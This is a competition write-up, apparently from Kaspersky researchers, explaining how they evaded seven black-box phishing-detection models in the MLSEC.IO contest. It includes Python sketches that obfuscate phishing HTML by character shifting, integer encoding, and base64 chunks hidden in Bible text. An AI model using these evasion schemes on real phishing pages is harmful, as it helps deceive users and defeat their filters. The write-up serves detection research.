Last active Jul 13, 2022
MLSEC.IO Phishing Track Solution

About us: Our team comprises two data scientists from the Technology Research team at Kaspersky, who are working on, among other things, Machine Learning (ML) based phishing detection technologies. Here’s how we achieved first place in the phishing track of the Machine Learning Security Evasion Competition, sponsored by Microsoft and partners CUJO AI, NVIDIA, VMRay, and MRG Effitas.

Task description

The task was to modify 10 (synthetic) phishing samples so that seven phishing detection models would believe they were benign. A model was bypassed if it returned a probability of less than 0.1 for a given sample. However, there was a catch: after modification, the samples needed to look the same as before (to be precise, screenshots of the rendered original and modified HTML files had to have the same hashes). The models were available only via an API, that is, the setting was black-box. To win, you needed to fool as many models as possible for each sample, using the fewest API queries.
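The bypass criterion can be expressed as a small check. This is a minimal sketch, assuming the API returns one probability per model for a sample; the function names are hypothetical and not part of the competition API.

```python
from typing import List, Sequence

# From the task description: a probability below 0.1 counts as a bypass.
BYPASS_THRESHOLD = 0.1


def bypassed_models(probabilities: Sequence[float],
                    threshold: float = BYPASS_THRESHOLD) -> List[int]:
    """Return the indices of the models that scored the sample below the threshold."""
    return [i for i, p in enumerate(probabilities) if p < threshold]


def fully_evades(probabilities: Sequence[float],
                 threshold: float = BYPASS_THRESHOLD) -> bool:
    """True if every model scored the sample below the threshold."""
    return len(bypassed_models(probabilities, threshold)) == len(probabilities)
```

For example, `bypassed_models([0.02, 0.2, 0.09])` returns `[0, 2]`: the second model would still flag the sample.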

What we did

At first, we considered a classic model replication attack (see AML.T0005 of MITRE ATLAS). This kind of attack would entail submitting a large number of phishing and non-phishing pages to retrieve the outputs of the models, then training our own ‘shadow’ models, which we would attempt to bypass offline. But as we started working on the competition, we noted that the leader had already achieved the highest possible score using just 343 API calls (with one full upload costing 70 calls). We did not have the API query budget for a replication attack, which probably made the setting a bit more realistic. We therefore had to rely on domain expertise and chance.

We started off by submitting several clean web pages, such as Wikipedia pages, to check what probabilities the models returned. While the first three models were happy with them, the remaining four consistently produced probabilities significantly larger than 0.1. We also learned from the API response speed that the models probably ingested the raw HTML, without any kind of browser rendering.

Littering the page with invisible text

We composed a simple script to check render hashes and tried our first solution: adding a large hidden chunk of a Wikipedia page to a phishing sample, fixing invalid HTML, and applying minification. This worked, but only for the first three models. We wondered whether some of the models could be overfitted on the provided samples. In the process, we learned that the last three models often produced identical scores, so to save API calls we only tested our samples on the previous model (probably the most sensitive one).
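The hidden-text idea can be sketched as follows. The write-up does not say how the text was hidden, so the `display:none` wrapper and the `add_hidden_text` helper are assumptions made for illustration; whether the render hash stays unchanged would still need to be verified against real screenshots.

```python
import html


def add_hidden_text(page: str, cloak_text: str) -> str:
    """Append benign text in a non-rendered block just before </body>.

    Assumption: an inline display:none style keeps the text out of the render.
    """
    hidden = '<div style="display:none">' + html.escape(cloak_text) + "</div>"
    idx = page.lower().rfind("</body>")
    if idx == -1:
        # No closing body tag found: fall back to appending at the end.
        return page + hidden
    return page[:idx] + hidden + page[idx:]
```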

Obfuscation via byte shift

Working on phishing detection, we, like Rutger Hauer in Blade Runner, had seen things. Phishing payloads hidden in Morse code. Phishing pages consisting almost entirely of screenshots in base64. Actual page text encrypted with ROT13. Drawing on this domain knowledge, we devised our first obfuscation scheme:

  1. Create a small fake ‘personal blog’ page.
  2. Take the actual phishing page, shift all the symbols by n and store as a string.
  3. On page load, shift the symbols back and document.write the result back to the page.

However, this turned out to be a bad idea: not only did the shifting process create all kinds of escaping issues, but the last three models still sounded alarms on our samples. We added popular header tags, such as <meta>, which somehow led to poorer results on the first three models. It felt like the last three models were unhappy about the large number of HTML tags or, perhaps, the high-entropy payload string.
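The three steps above can be sketched as a small generator script. This is an illustration under stated assumptions, not our original code: the helper names, the shift value and the blog markup are hypothetical, and the sketch only handles text in the Basic Multilingual Plane. It also shows one of the escaping issues: the shifted string may happen to contain `</script>`, so every `<` in the embedded literal is escaped.

```python
import json


def shift_text(text: str, n: int) -> str:
    """Shift every character's code point by n (assumes small n and BMP text)."""
    return "".join(chr(ord(c) + n) for c in text)


def unshift_text(text: str, n: int) -> str:
    """Inverse of shift_text; mirrors what the in-page JavaScript does."""
    return "".join(chr(ord(c) - n) for c in text)


def build_loader_page(phishing_html: str, n: int = 3) -> str:
    """Wrap the shifted payload in a decoy page that restores it on load."""
    # json.dumps gives a valid JavaScript string literal; escaping "<" keeps
    # a stray "</script>" in the payload from closing the script element.
    payload = json.dumps(shift_text(phishing_html, n)).replace("<", "\\u003c")
    script = (
        "window.onload = function () {"
        "var p = " + payload + ";"
        "document.write(p.split('').map(function (c) {"
        "return String.fromCharCode(c.charCodeAt(0) - " + str(n) + ");"
        "}).join(''));"
        "document.close();"
        "};"
    )
    return ("<html><body><p>My personal blog</p><script>"
            + script + "</script></body></html>")
```

Calling document.write after the page has loaded replaces the whole document, which is why the decoy blog content does not remain in the final render.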

Obfuscation via byte integer encoding

We then tried another kind of obfuscation. Instead of shifting, we encoded each byte as an integer and put the numbers into invisible <img> tags. This fooled the first four models but not the last three, although the results were better than before. We wondered whether the last three models reacted strongly to the obfuscator code itself. Perhaps they didn’t like document.write? We submitted an empty page with the obfuscator present and learnt that the probabilities were quite low, from 0.074 on the first four models to 0.19 on the remaining three, meaning the phish-y JavaScript was not what the models looked at.
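A minimal sketch of the byte-to-integer encoding is shown below. Where exactly the numbers sat inside the <img> tags is not stated above, so the `hidden` attribute, the `data-b` attribute and the chunk size are assumptions chosen for illustration.

```python
import re


def bytes_to_img_tags(data: bytes, chunk_size: int = 30) -> str:
    """Encode bytes as decimal integers stored in hidden <img> elements.

    Assumption: the numbers live in a hypothetical data-b attribute.
    """
    tags = []
    for i in range(0, len(data), chunk_size):
        numbers = " ".join(str(b) for b in data[i:i + chunk_size])
        tags.append('<img hidden data-b="%s">' % numbers)
    return "\n".join(tags)


def img_tags_to_bytes(markup: str) -> bytes:
    """Recover the original bytes; the in-page decoder would do the same in JavaScript."""
    out = bytearray()
    for numbers in re.findall(r'<img hidden data-b="([0-9 ]*)">', markup):
        out.extend(int(x) for x in numbers.split())
    return bytes(out)
```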

Less tags, more text

We hypothesized that the models somehow took character distribution into account. Considering their probable aversion to HTML tags, we used a big chunk of raw text: an excerpt from the Bible. We added relevant <meta> tags to the header and hid chunks of numericized bytes among the verses like this:

20:18 And he said, Whether [101 49 99 114 117 119 89 79 108 80 78 90 65 83 83 47 56 122 74 74 57 69 104 108 85 67 105 72 106 108] they be come out for peace, take them alive; 
or whether they [70 50 43 97 107 121 71 68 48 47 104 105 83 86 86 108 107 106 107 48 114 111 49 114 78 83 49 85 118 75] be come out for war, take them alive.

This worked! Nine pages out of 10 bypassed all seven models, while the 03.html sample was rejected as too large (the maximum size was experimentally determined to be 10 MB). Moreover, the probabilities were the same for every page that passed:

Model        00    01    02    03    04     05     06
Probability  0.02  0.02  0.02  0.02  0.084  0.087  0.087
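The cloaking scheme from this section can be sketched as below. This is an approximation under assumptions: the helper names and the mid-line placement rule are hypothetical, and the cover text is assumed to contain no bracketed numbers of its own.

```python
import re
from typing import Sequence


def cloak(payload: bytes, lines: Sequence[str], chunk_size: int = 30) -> str:
    """Hide bracketed chunks of byte values in the middle of cover-text lines."""
    out = []
    for idx, start in enumerate(range(0, len(payload), chunk_size)):
        numbers = " ".join(str(b) for b in payload[start:start + chunk_size])
        words = lines[idx % len(lines)].split(" ")  # reuse cover lines cyclically
        middle = len(words) // 2
        out.append(" ".join(words[:middle] + ["[" + numbers + "]"] + words[middle:]))
    return "\n".join(out)


def uncloak(text: str) -> bytes:
    """Collect every bracketed run of integers and turn it back into bytes."""
    out = bytearray()
    for numbers in re.findall(r"\[([0-9 ]+)\]", text):
        out.extend(int(x) for x in numbers.split())
    return bytes(out)
```

The decoder ignores everything outside the brackets, so the ratio of cover text to payload can be tuned freely without touching the decoding logic.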

By that time, we still had about 50 API calls.

Back to base (64)

This obfuscation scheme was highly inefficient: each byte at least quadrupled in size. 03.html was a monster of a page, weighing 4 MB due to a few high-res base64-encoded images. We dug into the source code and noticed that some of them were duplicated, so we carved them out. The page slimmed down to 1.7 MB. Alas, to make the obfuscated page smaller than 10 MB, we were forced to radically increase the numbers-to-text ratio. The last three models sounded alarms, probably because they were suspicious of the unusual character count distribution. However, we learnt that if we changed the separator from a space to \n, the sample bypassed them, which suggested that the models did at least some kind of line-by-line processing.

In addition to being inefficient, the pages loaded very slowly. So slowly, in fact, that the grading system returned a screenshot equality check failure for 03.html with byte-to-integer obfuscation. We were wary of using base64 at first, as it was commonly used in the original samples, but in the last hours of the competition, we decided to give it a try and placed base64 chunks among the cloak text:

1:2 And the earth was without form, and void; and darkness was upon
the face of the deep. And the Spirit of God moved upon the face of the

It worked! The page loading time also decreased sharply, and we were able to finally receive the full score for 03.html with the following model outputs:

Model        00     01     02     03     04     05     06
Probability  0.017  0.017  0.017  0.017  0.072  0.076  0.076
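The base64 variant, and the reason it shrinks the page, can be sketched as follows. The bracket delimiters, chunk size and helper names are assumptions for illustration, and the expansion figures cover the encoded payload only, not the cover text.

```python
import base64
import re
from typing import Sequence, Tuple


def cloak_base64(payload: bytes, lines: Sequence[str], chunk_size: int = 60) -> str:
    """Append bracketed base64 chunks to cover-text lines (delimiters are an assumption)."""
    encoded = base64.b64encode(payload).decode("ascii")
    out = []
    for idx, start in enumerate(range(0, len(encoded), chunk_size)):
        chunk = encoded[start:start + chunk_size]
        out.append(lines[idx % len(lines)] + " [" + chunk + "]")
    return "\n".join(out)


def uncloak_base64(text: str) -> bytes:
    """Join the bracketed chunks in order and decode them as one base64 string."""
    encoded = "".join(re.findall(r"\[([A-Za-z0-9+/=]+)\]", text))
    return base64.b64decode(encoded)


def expansion_factors(payload: bytes) -> Tuple[float, float]:
    """Return (integer-encoding factor, base64 factor) relative to the raw size."""
    if not payload:
        raise ValueError("payload must not be empty")
    as_integers = " ".join(str(b) for b in payload)
    as_base64 = base64.b64encode(payload)
    return len(as_integers) / len(payload), len(as_base64) / len(payload)
```

Base64 emits four characters for every three input bytes, so its factor stays close to 4/3, while space-separated decimal integers need up to four characters per byte.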


This was an exciting competition, and even though we did not employ any adversarial ML techniques per se, we were able to deduce, at least in general terms, how the models worked by observing their outputs, and to craft an obfuscation scheme to fool them. This demonstrates the difficulty of detecting phishing pages, and why existing production systems do not rely on HTML code alone to block them. We want to thank the organizers for the opportunity to participate in this competition, and we hope you enjoyed this write-up.